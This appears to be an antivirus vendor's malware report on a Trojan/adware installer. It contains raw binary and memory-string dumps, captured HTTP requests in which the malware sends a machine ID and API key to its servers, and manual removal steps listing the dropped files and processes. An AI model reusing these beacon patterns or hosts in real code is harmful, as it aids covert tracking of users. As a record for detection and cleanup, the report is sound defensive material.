....o....o ...%.o!...%.o"...%o#.......io$....o%...(.....o&...*Vr...p..
...r9..p.....*..('...*.~....-.ri..p.....((...o)...s*........~....*.~..
..*.......*.~....*..( ...*Vs....(,...t.........*.BSJB............v2.0.
50727......l...t...#~...... ...#Strings............#US.........#GUID..
.....P...#Blob...........W..........3........ ...................,....
...............................................Y.................^....
.......<.................y.......................K.................
............Y.....p.....0.......$...3.......J.....J...............s...
..R....._.......................?.....(...........j...................
....s.......................................z.P.=......... .m.=.......
....m.e...............................Z...P ............. ........<<< skipped >>>
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:30:01 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=410fd42516ca2d083c0e1060ea1bafd9d303f0f7; expires=Mon, 26-Mar-2018 02:30:01 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Mon, 26 Mar 2018 00
:30:01 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=410fd42516ca2d083c0e1060ea1bafd9d303f0f7; e
xpires=Mon, 26-Mar-2018 02:30:01 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:30:01 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=da37e3835ea758e644d83be9c97878b8fa9e66e9; expires=Mon, 26-Mar-2018 02:30:01 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Mon, 26 Mar 2018 00:30:01 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=da37e
3835ea758e644d83be9c97878b8fa9e66e9; e..
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:59 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=qkl15tssh42n6lu0rnj47rdpi1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8{"message":"Track was added"}....
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:59 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=ausq93k8j3pt7gb519shdfn4m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8{"message":"Track was added"}..
The Trojan connects to the servers at the folowing location(s):
.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641
58NPSAZXW.exe_2692_rwx_0040C000_00004000:
li^~
Li^
wyrm4bnfuck.exe_2968:
.idata.rdataP.relocP.rsrckernel32.dlluxtheme.dlluserenv.dllsetupapi.dllapphelp.dllpropsys.dlldwmapi.dllcryptbase.dlloleacc.dllversion.dllprofapi.dllcomres.dllclbcatq.dll.DEFAULT\Control Panel\InternationalFile I/O error %dlzmadecompsmall: Compressed data is corrupted (%d)lzmadecompsmall: %sLzmaDecode failed (%d)shell32.dll/SUPPRESSMSGBOXES/PASSWORD=passwordSpecifies the password to use.For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline/SL5="$%x,%d,%d,Inno Setup Setup Data (5.5.7)Inno Setup Messages (5.5.3)user32.dlloleaut32.dlladvapi32.dllRegOpenKeyExARegCloseKeyGetWindowsDirectoryAMsgWaitForMultipleObjectsExitWindowsExcomctl32.dllname="JR.Inno.Setup"version="1.0.0.0"name="Microsoft.Windows.Common-Controls"version="6.0.0.0"publicKeyToken="6595b64144ccf1df"<requestedExecutionLevel level="asInvoker" uiAccess="false"/><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>!'%s' is not a valid integer value('%s' is not a valid floating point value'%s' is not a valid date'%s' is not a valid time!'%s' is not a valid date and timeI/O error %dInteger overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pOperation aborted%Exception %s in module %s at %p.Application Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'Invalid variant operation"Variant method calls not supportedExternal exception %x4.6.5wyrm4bnfuck.tmp_2520:
.idata.rdataP.relocP.rsrckernel32.dlluxtheme.dlluserenv.dllsetupapi.dllapphelp.dllpropsys.dlldwmapi.dllcryptbase.dlloleacc.dllversion.dllprofapi.dllcomres.dllclbcatq.dll%s_%dEInvalidOperationTKeyEventTKeyPressEventcrSQLWaitt.HtREInvalidGraphicOperationTWindowStatepoProportionalKeyPreviewTWindowState`OnKeyDownD1AOnKeyPressOnKeyUp\0ACTL3D32.DLLPasswordCharDssHorizontalOnKeyUpRegDeleteKeyExAadvapi32.dll.DEFAULT\Control Panel\Internationaluser32.dllshlwapi.dllTPSExecTPSRuntimeClassImporterTPSExportedVarCannot ImportInterface not supportedTPSCustomDebugExecTPSDebugExecRICHED20.DLLRICHED32.DLLRstrtmgr.dllFile I/O error %dMessages file "%s" is missing. Please correct the problem or obtain a new copy of the program.shell32.dllHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_CURRENT_CONFIGHKEY_DYN_DATAWININIT.INIt.HtbSoftware\Microsoft\Windows\CurrentVersion\SharedDLLsRegCreateKeyExRegOpenKeyExsfc.dllcmd.exe" /C "COMMAND.COM" /CPendingFileRenameOperationsPendingFileRenameOperations2Software\Microsoft\Windows\CurrentVersion\FontsSoftware\Microsoft\Windows NT\CurrentVersion\FontsIPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)IPropertyStore::SetValue(PKEY_AppUserModel_ID)IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)OLEAUT32.DLLLog opened. (Time zone: UTC%s%.2u:%.2u)%s Log %s #%.3u.txtMsgWaitForMultipleObjectsregsvr32.exe"Cannot register 64-bit DLLs on this version of WindowsHELPER_EXE_AMD64Cannot utilize 64-bit features on this version of Windows64-bit helper EXE wasn't extracted\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8xCreateNamedPipeSetNamedPipeHandleStatehelper %d 0x%xHelper process PID: %uStopping 64-bit helper process. (PID: %u)Helper process exited with failure code: 0x%xTransactNamedPipeTransactNamedPipe/GetOverlappedResultHelper: Command did not executeSOFTWARE\Microsoft\.NETFramework.NET Framework not foundSOFTWARE\Microsoft\.NETFramework\Policy\v4.0v4.0.30319SOFTWARE\Microsoft\.NETFramework\Policy\v2.0v2.0.50727SOFTWARE\Microsoft\.NETFramework\Policy\v1.1v1.1.4322.NET Framework version %s not foundFusion.dllFailed to load .NET Framework DLL "%s"Failed to get address of .NET Framework CreateAssemblyCache function.NET Framework CreateAssemblyCache function failedMoveFileEx failed (%d).Deleting directory: %sFailed to delete directory (%d). Will retry later.Failed to delete directory (%d). Will delete on restart (if empty).Failed to delete directory (%d).Deleting file: %sFailed to delete the file; it may be in use (%d).ExtractRecData: Unicode data unsupported by this buildThe file appears to be in use (%d). Will delete on restart.Decrementing shared count (%d-bit): %sUnregistering 64-bit DLL/OCX: %sUnregistering 32-bit DLL/OCX: %sNot unregistering DLL/OCX again: %sUnregistering 64-bit type library: %sUnregistering 32-bit type library: %sUninstalling from GAC: %sRunning Exec filename:Running Exec parameters:CreateProcess failed (%d).Process exit code: %uRunning ShellExec filename:Running ShellExec parameters:ShellExecuteEx failed (%d).Skipping RunOnceId "%s" filename: %sUnregistering font: %szlib: Internal error. Code %d1.2.1bzlib: Internal error. Code %dlzmadecomp: %slzmadecomp: Compressed data is corrupted (%d)DecodeToBuf failed (%d)UhQ%FUh$%FTPasswordEditPasswordEdit(PasswordDc:\directorySoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedUhßPasswordPagePasswordLabelPasswordEditPasswordEditLabel$Could not find page with ID %dSoftware\Microsoft\Windows\CurrentVersion\Uninstall%s\%s_is1RestartManager found an application using one of our files: %sCan use RestartManager to avoid reboot? %s (%d)CheckPasswordPrepareToInstall failed: %sNeed to restart Windows? %s/:*?"<>|\/:*?"<>|%s-%d.bin%s-%d%s.bin..\DISK%d\Asking user for new disk containing "%s".Cannot read an encrypted file before the key has been setLoggedMsgBox returned an unexpected value. Assuming Abort.Software\Microsoft\Windows\CurrentVersion\Uninstall\5.5.9 (a)URLInfoAboutURLUpdateInfoCreating directory: %sSetting permissions on directory: %sFailed to set permissions on directory (%d).Setting NTFS compression on directory: %sUnsetting NTFS compression on directory: %sFailed to set NTFS compression state (%d).IMsgFailed to set value in Fonts registry key.Failed to open Fonts registry key.Setting permissions on file: %sFailed to set permissions on file (%d).Setting NTFS compression on file: %sUnsetting NTFS compression on file: %s%s: The existing file appears to be in use (%d). Will replace on restart.%s: The existing file appears to be in use (%d). Retrying.Dest filename: %sDest file is protected by Windows File Protection.Time stamp of our file: %sTime stamp of existing file: %sVersion of our file: %u.%u.%u.%uVersion of existing file: %u.%u.%u.%uExisting file is protected by Windows File Protection. Skipping.Uninstaller requires administrator: %sRegistering file as a font ("%s")Cannot install files to 64-bit locations on this version of Windowsdesktop.ini.ShellClassInfo{0AFACED1-E828-11D1-9187-B532F1E9575D}target.lnkDesktop.iniSoftware\Microsoft\Windows\CurrentVersion\App Paths\Section: %sEntry: %sValue: %sUpdating the .INI file.Successfully updated the .INI file.Skipping updating the .INI file, only updating uninstall log.Setting permissions on registry key: %s\%sCould not set permissions on the registry key because it currently does not exist.Failed to set permissions on registry key (%d).Cannot access 64-bit registry keys on this version of WindowsRegistration executable created: %sSoftware\Microsoft\Windows\CurrentVersion\RunOnceRegistering 64-bit DLL/OCX: %sRegistering 32-bit DLL/OCX: %sRegistering 64-bit type library: %sRegistering 32-bit type library: %sDirectory for uninstall files: %sWill append to existing uninstall log: %sWill overwrite existing uninstall log: %sCreating new uninstall log: %sLoggedMsgBox returned an unexpected value. Assuming Cancel.RmShutdown returned an error: %dFatal exception during installation process (%s):ExtractTemporaryFile: The file "%s" was not foundExtractTemporaryFiles: No files matching "%s" foundInvalid symbol '%s' foundInvalid token '%s' foundQuerySpawnServer: Unexpected response: $%xCallSpawnServer: Unexpected response: $%xCallSpawnServer: Unexpected status: %dShellExecuteExShellExecuteEx returned hProcess=0Wnd=$%xFormKeyDownPasswordCheckHashExpression error '%s'PasswordSuppressMsgBoxesCannot evaluate "%s" constant during UninstallCannot access a 64-bit key in a "reg" constant on this version of WindowsUnknown custom message name "%s" in "cm" constantsrcexeCannot expand "pf64" constant on this version of WindowsCannot expand "cf64" constant on this version of WindowsuninstallexeCannot expand "dotnet2064" constant on this version of WindowsCannot expand "dotnet4064" constant on this version of WindowsFailed to expand shell folder constant "%s"Unknown constant "%s"Software\Microsoft\Windows\CurrentVersionSOFTWARE\Microsoft\Windows NT\CurrentVersioncmd.exeCOMMAND.COM\_setup64.tmpshfolder.dll_isetup\_shfoldr.dllFailed to load DLL "%s"Found pending rename or delete that matches one of our files: %sWindows version: %u.%u.%u%s (NT platform: %s)64-bit Windows: %sProcessor architecture: %sDefaulting to %s for suppressed message box (%s):Message box (%s):User chose %s.MsgBox failed./SPAWNWND=$%x /NOTIFYWND=$%x64-bit install mode: %sWindows_isetup\_isdecmp.dll_isetup\_iscrypt.dll/Password=/SuppressMsgBoxes/DETACHEDMSG-0.binSetup version: Inno Setup version 5.5.9 (a)Original Setup EXE:Not restarting Windows because Setup is being run from the debugger.Restarting Windows.Inno Setup version 5.5.9 (a)Portions Copyright (C) 2000-2016 Martijn LaanhXXp://VVV.innosetup.com/hXXp://VVV.remobjects.com/psCannot run files in 64-bit locations on this version of WindowsType: ExecType: ShellExecRmRestart returned an error: %dNeed to restart Windows, not attempting to restart applicationsWill not restart Windows automatically.System\CurrentControlSet\Control\WindowsTOutputMsgWizardPageTOutputMsgMemoWizardPagePasswordEditPasswordEditLabelMsgLabelMsg1LabelMsg2Labelfunction CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;function GetIniString(const Section, Key, Default, Filename: String): String;function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;function IniKeyExists(const Section, Key, Filename: String): Boolean;function SetIniString(const Section, Key, Value, Filename: String): Boolean;function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;procedure DeleteIniEntry(const Section, Key, Filename: String);function GetCmdTail: String;function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;function CheckForMutexes(Mutexes: String): Boolean;function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;function MakePendingFileRenameOperationsChecksum: String;function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;function ExitSetupMsgBox: Boolean;function GetWindowsVersion: Cardinal;procedure GetWindowsVersionEx(var Version: TWindowsVersion);function GetWindowsVersionString: String;function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;function CustomMessage(const MsgName: String): String;function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;procedure RaiseException(const Msg: String);function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;Cannot call "%s" function during SetupCannot call "%s" function during UninstallCannot call "%s" function during non Unicode Setup or UninstallCREATEOUTPUTMSGPAGECREATEOUTPUTMSGMEMOPAGEMSGBOXInvalid RootKey valueINIKEYEXISTSGETCMDTAILREGKEYEXISTSREGDELETEKEYINCLUDINGSUBKEYSREGDELETEKEYIFEMPTYREGGETSUBKEYNAMESCHECKFORMUTEXESSHELLEXECSHELLEXECASORIGINALUSERMAKEPENDINGFILERENAMEOPERATIONSCHECKSUMUnknown custom message name "%s"EXITSETUPMSGBOXGETWINDOWSVERSIONGETWINDOWSVERSIONSTRING%u.%.2u.%uSUPPRESSIBLEMSGBOX%u.%u.%u.%uCannot disable FS redirection on this version of WindowsGetWindowsVersionExRuntime Error (at %d:%d):Exception "%s" at address %pTScriptRunner.SetPSExecParameters: Invalid typeTScriptRunner.LoadScript failedRemove shared file %s? User chose %s%s/INITPROCWND=$%x/SECONDPHASE="%s" /FIRSTPHASEWND=$%xOriginal Uninstall EXE:Install was done in 64-bit mode but not running 64-bit Windows nowRemoved all? %sNot restarting Windows because Uninstall is being run from the debugger.IMsgtisRS-???.tmpisRS-%.3u.tmpDisableProcessWindowsGhostingFTPF0P0123456789abcdefInno Setup Setup Data (5.5.7)Inno Setup Messages (5.5.3)oleaut32.dllRegQueryInfoKeyARegOpenKeyExARegEnumKeyExARegDeleteKeyARegCreateKeyExARegCloseKeyGetWindowsDirectoryACreateNamedPipeAmpr.dllgdi32.dllSetViewportOrgExUnhookWindowsHookExSetWindowsHookExAMapVirtualKeyAGetKeyStateGetKeyNameTextAExitWindowsExEnumWindowsEnumThreadWindowscomctl32.dllole32.dllShellExecuteExAShellExecuteAcomdlg32.dllmsimg32.dll.text`.rdata@.data.pdata@.rsrcCOMCTL32.dllSHLWAPI.dllSetProcessShutdownParametersKERNEL32.dllADVAPI32.dllSHELL32.dllOLEAUT32.dll<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXMZ`.data.rsrc@.relocSoftware\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersSOFTWARE\Microsoft\Windows\CurrentVersionSoftware\Microsoft\Windows\CurrentVersion\ProfileReconciliationRegKeyGetWindowsDirectoryWRegOpenKeyASHFOLDER.dlldll\shfolder.dbgFont.ColorFont.HeightFont.NameFont.StyleOnKeyDownLines.Stringsname="JR.Inno.Setup"version="1.0.0.0"name="Microsoft.Windows.Common-Controls"version="6.0.0.0"publicKeyToken="6595b64144ccf1df"<requestedExecutionLevel level="asInvoker" uiAccess="false"/><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>Cannot assign a %s to a %sCannot create file %sCannot open file %sStream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instanceClass %s not foundResource %s not found!Resource %s is of incorrect classList index out of bounds Operation not allowed on sorted string list%String list does not allow duplicatesTab index out of bounds#A component named %s already exists$''%s'' is not a valid component nameA class named %s already exists#''%s'' is not a valid integer valueError reading %s.%s: %sAncestor for '%s' not foundBitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)Unsupported clipboard formatError creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window%s property out of range%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per applicationCould not load CARDS.DLLDuplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversationGrid too large for operation Too many rows or columns deleted%s on line %d''%s'' expected%s expectedInvalid input value7Invalid input value. Use escape key to abandon changesValue must be between %d and %d<Cannot create a default method name for an unnamed component''%s'' is not a valid date''%s'' is not a valid time#''%s'' is not a valid date and timeInvalid file name - %sAll files (*.*)|*.*&Files: (*.*)Invalid clipboard format Clipboard does not support IconsCustom Colors Operation not supported on selected printer.There is no default printer currently selectedUnable to write to %sInvalid data type for '%s'Failed to create key %sFailed to set data for '%s'Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)/Menu '%s' is already being used by another formFailed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %sHot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value'%s' is not a valid date'%s' is not a valid time!'%s' is not a valid date and timeI/O error %dInteger overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pOperation aborted%Exception %s in module %s at %p.Application Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'Invalid variant operation"Variant method calls not supportedExternal exception %xn%USERPROFILE%r%SYSTEMROOT%5.50.4807.2300Microsoft(R) Windows (R) 2000 Operating SystemDatos de programa%Configuraci51.52.0.0
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
SecondL.exe:3236
wyrm4bnfuck.exe:2968
OneTwo.exe:840
up.exe:3864
%original file name%.exe:3676 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe (68980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MJFS9.tmp\wyrm4bnfuck.tmp (1569 bytes)
%Program Files%\58NPSAZXWZ\58NPSAZXW.exe (69780 bytes)
%Program Files%\58NPSAZXWZ\uninstaller.exe (2590 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\58NPSAZXWZ\58NPSAZXW.exe.config (1 bytes)
%Program Files%\58NPSAZXWZ\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
